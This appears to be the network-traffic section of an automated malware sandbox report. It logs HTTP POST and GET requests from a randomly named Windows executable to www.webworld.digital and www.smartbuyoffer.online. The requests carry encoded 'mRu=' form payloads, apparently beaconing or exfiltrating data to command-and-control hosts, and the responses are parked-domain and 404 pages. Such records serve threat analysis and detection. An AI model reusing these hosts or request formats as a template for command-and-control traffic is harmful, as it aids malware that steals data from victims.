                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.webworld.digital
                                                                                                                            Referer: http://www.webworld.digital/zis1/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 77 43 4d 48 2f 7a 38 34 2f 72 34 6c 47 66 6f 68 4b 4b 58 73 7a 56 76 52 43 6c 76 78 65 2f 72 34 5a 38 45 65 6b 66 56 64 4f 44 79 58 76 6b 53 55 39 75 2b 53 67 34 37 45 53 47 4a 71 6e 42 35 49 65 79 4c 47 68 61 76 5a 43 77 78 5a 4d 79 32 31 55 4e 79 6b 77 66 59 7a 34 56 48 59 42 76 67 61 48 67 59 74 69 53 4b 70 2b 69 41 52 61 36 73 68 36 30 74 6b 68 34 36 64 4e 33 4d 4c 42 55 31 57 64 49 39 4f 47 51 70 41 4a 39 31 74 32 78 67 4a 6e 46 36 35 75 2f 55 56 66 4f 5a 62 44 48 6b 64 39 47 4a 62 2b 47 48 48 51 6d 34 44 35 6f 4b 4d 69 61 6b 4a 6e 4a 6e 6d 4b 61 52 4c 63 75 6d 63 74 77 3d 3d
                                                                                                                            Data Ascii: mRu=wCMH/z84/r4lGfohKKXszVvRClvxe/r4Z8EekfVdODyXvkSU9u+Sg47ESGJqnB5IeyLGhavZCwxZMy21UNykwfYz4VHYBvgaHgYtiSKp+iARa6sh60tkh46dN3MLBU1WdI9OGQpAJ91t2xgJnF65u/UVfOZbDHkd9GJb+GHHQm4D5oKMiakJnJnmKaRLcumctw==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            34192.168.11.204975384.32.84.32802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:32:01.329886913 CET779OUTPOST /zis1/ HTTP/1.1
                                                                                                                            Host: www.webworld.digital
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.webworld.digital
                                                                                                                            Referer: http://www.webworld.digital/zis1/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 77 43 4d 48 2f 7a 38 34 2f 72 34 6c 45 2f 34 68 49 74 6a 73 6e 46 76 53 4e 46 76 78 51 66 71 7a 5a 38 59 65 6b 64 35 4e 4f 56 69 58 76 46 43 55 7a 4b 69 53 6a 34 37 45 4b 57 4a 56 71 68 34 6c 65 79 48 67 68 66 48 5a 43 30 68 5a 4d 32 36 31 55 2b 61 6c 78 50 59 78 6a 6c 48 67 4f 50 67 61 48 67 59 74 69 53 65 50 2b 69 6f 52 5a 4c 63 68 31 77 34 57 2f 6f 36 43 45 58 4d 4c 46 55 31 53 64 49 38 62 47 52 46 71 4a 2f 39 74 32 78 77 4a 2b 30 36 36 67 2f 55 58 43 2b 5a 49 53 69 4e 4d 31 43 78 73 2b 33 66 46 65 44 73 62 78 65 48 57 2f 6f 51 74 6b 61 37 55 4f 71 6f 6a 65 73 6e 48 77 79 61 49 36 64 71 78 41 67 61 6b 55 72 35 78 6c 71 5a 4d 39 6d 73 3d
                                                                                                                            Data Ascii: mRu=wCMH/z84/r4lE/4hItjsnFvSNFvxQfqzZ8Yekd5NOViXvFCUzKiSj47EKWJVqh4leyHghfHZC0hZM261U+alxPYxjlHgOPgaHgYtiSeP+ioRZLch1w4W/o6CEXMLFU1SdI8bGRFqJ/9t2xwJ+066g/UXC+ZISiNM1Cxs+3fFeDsbxeHW/oQtka7UOqojesnHwyaI6dqxAgakUr5xlqZM9ms=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            35192.168.11.204975484.32.84.32802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:32:04.094104052 CET1289OUTPOST /zis1/ HTTP/1.1
                                                                                                                            Host: www.webworld.digital
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.webworld.digital
                                                                                                                            Referer: http://www.webworld.digital/zis1/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 77 43 4d 48 2f 7a 38 34 2f 72 34 6c 45 2f 34 68 49 74 6a 73 6e 46 76 53 4e 46 76 78 51 66 71 7a 5a 38 59 65 6b 64 35 4e 4f 56 71 58 76 31 65 55 38 4c 69 53 74 59 37 45 55 47 4a 75 71 68 34 64 65 79 76 73 68 66 4b 75 43 79 39 5a 4e 56 79 31 63 76 61 6c 37 50 59 78 72 46 48 62 42 76 67 50 48 6d 34 70 69 53 4f 50 2b 69 6f 52 5a 4a 55 68 78 6b 73 57 39 6f 36 64 4e 33 4d 58 42 55 30 50 64 4c 4d 4c 47 52 42 51 49 4f 64 74 33 52 41 4a 6c 69 75 36 6f 2f 55 52 53 75 59 56 53 69 49 55 31 43 46 47 2b 33 62 76 65 45 34 62 79 76 76 4c 6b 64 77 7a 35 70 37 35 4d 70 6f 4a 53 73 33 4b 35 7a 71 74 39 65 43 37 4a 6e 72 38 51 4b 70 71 38 76 41 48 68 6a 66 35 32 74 75 63 71 65 4f 6b 39 53 52 74 71 4b 70 6a 37 67 30 7a 78 46 50 37 37 53 65 62 51 4b 59 6d 55 77 4d 68 4c 78 38 65 42 4f 38 48 6e 7a 4e 67 42 4a 64 55 57 43 44 43 77 71 69 52 72 70 69 50 34 41 2b 6c 57 68 42 42 62 73 5a 50 42 35 4b 36 46 2f 30 6e 61 6c 63 4f 4d 68 6a 2b 31 32 54 67 30 59 64 5a 6d 65 52 62 42 48 2b 39 51 4a 70 69 6a 4f 30 68 54 42 [TRUNCATED]
                                                                                                                            Data Ascii: mRu=wCMH/z84/r4lE/4hItjsnFvSNFvxQfqzZ8Yekd5NOVqXv1eU8LiStY7EUGJuqh4deyvshfKuCy9ZNVy1cval7PYxrFHbBvgPHm4piSOP+ioRZJUhxksW9o6dN3MXBU0PdLMLGRBQIOdt3RAJliu6o/URSuYVSiIU1CFG+3bveE4byvvLkdwz5p75MpoJSs3K5zqt9eC7Jnr8QKpq8vAHhjf52tucqeOk9SRtqKpj7g0zxFP77SebQKYmUwMhLx8eBO8HnzNgBJdUWCDCwqiRrpiP4A+lWhBBbsZPB5K6F/0nalcOMhj+12Tg0YdZmeRbBH+9QJpijO0hTBAFcRNSQl6u5EdBY9+d+YXiq//DPXM71l8WowVaf7ho7r8TRftVx8Tg8e4nuWcwKfa1MrgEV2+dKxXk8LZNJWaCEIQYPC3qSt7oI100UHhIZreWk2iM27zLxZXrcl08ttZNwjua+BPUhl0jwGN9IuoeL6oIOXwEJ5RQC83mTeyplEZ3adfcXpcXmZsdbCeJ5xWXiBaKG+z4UdWpITn+VGsIH/QqX3hVgGO4GJ14/ZTjP94CIyGA43+R/FpulwiVazeAd0D/PXSOfg6rQDEML1fPKlkEVgGnZtSd4yW0wKFrh0nsxB6H/a3m3oexK3pIowJkglevZ+aC9yqmLnPZfoqOC+D6RDwhfo8Beum/3AjYaDy0kWZWj1zqrI9IUlWKd8uZw8hmE
                                                                                                                            Nov 12, 2024 15:32:04.094151974 CET1289OUTData Raw: 39 6e 70 47 4e 5a 48 76 35 73 68 36 45 2f 38 46 31 5a 5a 54 75 4a 6d 54 7a 58 6f 42 64 45 68 4f 2b 5a 64 4d 4e 38 77 2b 65 43 51 66 4e 31 61 43 4b 2f 4a 30 67 59 62 4b 2b 4e 72 61 6d 5a 47 32 76 72 71 63 78 38 6d 77 32 34 6c 46 54 69 69 50 76 56
                                                                                                                            Data Ascii: 9npGNZHv5sh6E/8F1ZZTuJmTzXoBdEhO+ZdMN8w+eCQfN1aCK/J0gYbK+NramZG2vrqcx8mw24lFTiiPvVJU2Vp1ppNgbav94PM6DCPoEt/3ElPIT02jhYxNniesyyIVcJC7YmOCvywSRO3BxbqWObRRitvMJXmkP9/Sgh3IgXACn3aG3RlaCN3faV3yY9LPVljXlWpiIgTZ03IicJ52VsfwCFIw7MAezJ+XVcr2qlLq6ljeQ/m
                                                                                                                            Nov 12, 2024 15:32:04.094202042 CET5156OUTData Raw: 2f 31 6c 41 6c 72 77 70 73 42 56 47 4a 6f 63 51 4f 66 39 34 59 6e 4c 4c 4a 39 64 76 39 5a 4f 4b 57 31 48 79 75 79 67 6b 4a 39 54 78 4b 4d 69 6b 70 41 44 77 6c 63 4d 47 4a 6e 43 69 56 6b 63 71 42 34 61 43 42 6d 6a 65 6e 31 45 63 70 64 30 65 38 5a
                                                                                                                            Data Ascii: /1lAlrwpsBVGJocQOf94YnLLJ9dv9ZOKW1HyuygkJ9TxKMikpADwlcMGJnCiVkcqB4aCBmjen1Ecpd0e8ZSfKUgiohbXgZXdkUpE/KS2GhcyJIxSUDpnrvQzKxctDYXBXb6dxiJN07de+A9bKBDqkvIACVmBT1+ictQggLwvopkzCyaQWNIc1+XjHi4iAUPxkCXmdIVM00qIxk93qdEunurx6DXiXYZ30XNyjw8mVNqKXsGzwM7
                                                                                                                            Nov 12, 2024 15:32:04.094371080 CET194OUTData Raw: 46 7a 63 62 4b 48 55 50 72 65 42 6b 47 55 4f 47 69 59 41 41 44 48 6f 47 46 34 67 34 58 46 37 34 76 43 75 36 75 35 5a 75 62 42 58 56 74 6e 42 48 4b 58 2b 41 6a 79 4a 6b 6a 55 49 48 34 2f 59 49 77 4c 77 2f 59 6e 6d 59 43 70 7a 4e 39 65 6a 41 52 51
                                                                                                                            Data Ascii: FzcbKHUPreBkGUOGiYAADHoGF4g4XF74vCu6u5ZubBXVtnBHKX+AjyJkjUIH4/YIwLw/YnmYCpzN9ejARQpD+UID1pu1M46FyFtHSS++yp5UdyUnQt6a1J8aG6I2qUB+NlOWARH/oiGBei1mf/LnbNYgH8kDp0H0mP8Cwx08oZ6svynZJHPV0wwi8Yrx88Cg==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            36192.168.11.204975584.32.84.32802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:32:06.859771013 CET479OUTGET /zis1/?mRu=9Akn8HQ/w9IGHY5hfK3Sz2XWYTq6JbeGUZoZjuxeZl7qmmC+7O6Wru/gQUs9lGhVdHn4ksWgMiMPd3qmb+i3xZVXvSH4PNUsYgsF4Q6R4VB3b48Gv0g7yoc=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.webworld.digital
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:32:07.100400925 CET1289INHTTP/1.1 200 OK
                                                                                                                            Server: hcdn
                                                                                                                            Date: Tue, 12 Nov 2024 14:32:06 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 9973
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            x-hcdn-request-id: fc4fc5e78ef2f6c5dcc3a8dcf221be9e-asc-edge5
                                                                                                                            Expires: Tue, 12 Nov 2024 14:32:05 GMT
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;m
                                                                                                                            Nov 12, 2024 15:32:07.100459099 CET1289INData Raw: 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66 38
                                                                                                                            Data Ascii: argin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:60
                                                                                                                            Nov 12, 2024 15:32:07.100505114 CET1289INData Raw: 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f
                                                                                                                            Data Ascii: ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;lin
                                                                                                                            Nov 12, 2024 15:32:07.100550890 CET1289INData Raw: 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74
                                                                                                                            Data Ascii: ze:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:
                                                                                                                            Nov 12, 2024 15:32:07.100594044 CET1289INData Raw: 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f
                                                                                                                            Data Ascii: -graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidde
                                                                                                                            Nov 12, 2024 15:32:07.100739956 CET1289INData Raw: 46 69 6e 64 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d
                                                                                                                            Data Ascii: Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hosting</div><br><p>Add your website to any of your hosting plans. Follow the article
                                                                                                                            Nov 12, 2024 15:32:07.100749016 CET1289INData Raw: 54 46 2d 31 36 20 76 61 6c 75 65 22 29 3b 36 35 35 33 35 3c 72 26 26 28 72 2d 3d 36 35 35 33 36 2c 65 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 72 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 29 2c 72 3d
                                                                                                                            Data Ascii: TF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75*(o<26)-((0!=r)<<5)}function n(r,e,n){var t;
                                                                                                                            Nov 12, 2024 15:32:07.100750923 CET1289INData Raw: 68 61 72 43 6f 64 65 41 74 28 30 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 75 74 66 31 36 2e 65 6e 63 6f 64 65 28 6d 29 7d 2c 74 68 69 73 2e 65 6e 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 61 29 7b 76 61 72 20 68 2c 66 2c 69 2c 63 2c 75
                                                                                                                            Data Ascii: harCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLowerCase())).length;if(a)for(d=0;d<v;d++)w[d]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            37192.168.11.2049756108.179.252.152802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:32:12.400964022 CET771OUTPOST /fid8/ HTTP/1.1
                                                                                                                            Host: www.smartbuyoffer.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.smartbuyoffer.online
                                                                                                                            Referer: http://www.smartbuyoffer.online/fid8/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 65 6e 68 56 6a 49 33 75 41 65 45 36 79 2f 58 74 34 6a 75 39 52 73 33 30 43 30 34 4e 46 44 7a 41 70 69 53 70 4a 48 6a 69 33 36 35 55 41 59 36 45 42 4c 72 6b 68 2b 46 64 50 74 6e 71 44 58 73 74 56 39 36 74 6d 6c 55 34 34 39 52 72 36 50 70 38 73 6d 33 50 54 38 71 6b 36 52 55 6b 37 65 5a 58 33 66 77 6c 6f 2f 46 31 67 52 42 4a 4c 45 33 4e 41 48 50 6c 4f 43 5a 5a 53 6a 66 4c 65 6c 71 42 35 6f 4d 50 49 74 76 52 2f 74 51 58 2f 4e 31 57 67 6c 6d 37 58 73 4d 57 4b 79 49 35 54 77 50 37 6b 73 34 7a 6e 42 31 62 6f 54 32 55 4b 46 37 43 6a 59 67 77 65 4c 78 76 69 41 42 66 52 43 2b 73 62 77 3d 3d
                                                                                                                            Data Ascii: mRu=enhVjI3uAeE6y/Xt4ju9Rs30C04NFDzApiSpJHji365UAY6EBLrkh+FdPtnqDXstV96tmlU449Rr6Pp8sm3PT8qk6RUk7eZX3fwlo/F1gRBJLE3NAHPlOCZZSjfLelqB5oMPItvR/tQX/N1Wglm7XsMWKyI5TwP7ks4znB1boT2UKF7CjYgweLxviABfRC+sbw==
                                                                                                                            Nov 12, 2024 15:32:12.533979893 CET1121INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 12 Nov 2024 14:32:12 GMT
                                                                                                                            Server: Apache
                                                                                                                            Upgrade: h2,h2c
                                                                                                                            Connection: Upgrade, close
                                                                                                                            Last-Modified: Tue, 04 Oct 2022 14:01:30 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Content-Length: 836
                                                                                                                            Content-Type: text/html
                                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED]
                                                                                                                            Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            38192.168.11.2049757108.179.252.152802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:32:15.058449984 CET791OUTPOST /fid8/ HTTP/1.1
                                                                                                                            Host: www.smartbuyoffer.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.smartbuyoffer.online
                                                                                                                            Referer: http://www.smartbuyoffer.online/fid8/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 65 6e 68 56 6a 49 33 75 41 65 45 36 39 2b 6e 74 36 42 47 39 47 63 33 33 62 55 34 4e 4f 6a 7a 2b 70 69 4f 70 4a 47 6d 2f 30 4d 52 55 41 34 4b 45 47 4b 72 6b 69 2b 46 64 57 64 6d 75 48 58 73 51 56 39 32 6c 6d 6b 6f 34 34 39 46 72 36 4f 5a 38 73 52 44 4d 52 73 71 6d 79 78 55 6d 32 2b 5a 58 33 66 77 6c 6f 2b 67 69 67 56 74 4a 4b 31 48 4e 42 6d 50 6d 4e 43 59 72 45 54 66 4c 61 6c 71 46 35 6f 4d 68 49 73 6a 72 2f 6f 55 58 2f 4e 46 57 6e 30 6d 34 65 73 4e 64 4f 79 4a 65 61 54 57 74 6b 2b 55 42 72 42 68 63 73 47 36 63 47 7a 32 59 2b 71 55 55 64 59 74 64 6d 77 34 33 54 41 2f 33 47 36 42 46 79 54 4a 50 37 77 6b 6d 4d 35 78 57 53 5a 47 57 43 5a 73 3d
                                                                                                                            Data Ascii: mRu=enhVjI3uAeE69+nt6BG9Gc33bU4NOjz+piOpJGm/0MRUA4KEGKrki+FdWdmuHXsQV92lmko449Fr6OZ8sRDMRsqmyxUm2+ZX3fwlo+gigVtJK1HNBmPmNCYrETfLalqF5oMhIsjr/oUX/NFWn0m4esNdOyJeaTWtk+UBrBhcsG6cGz2Y+qUUdYtdmw43TA/3G6BFyTJP7wkmM5xWSZGWCZs=
                                                                                                                            Nov 12, 2024 15:32:15.183222055 CET1121INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 12 Nov 2024 14:32:15 GMT
                                                                                                                            Server: Apache
                                                                                                                            Upgrade: h2,h2c
                                                                                                                            Connection: Upgrade, close
                                                                                                                            Last-Modified: Tue, 04 Oct 2022 14:01:30 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Content-Length: 836
                                                                                                                            Content-Type: text/html
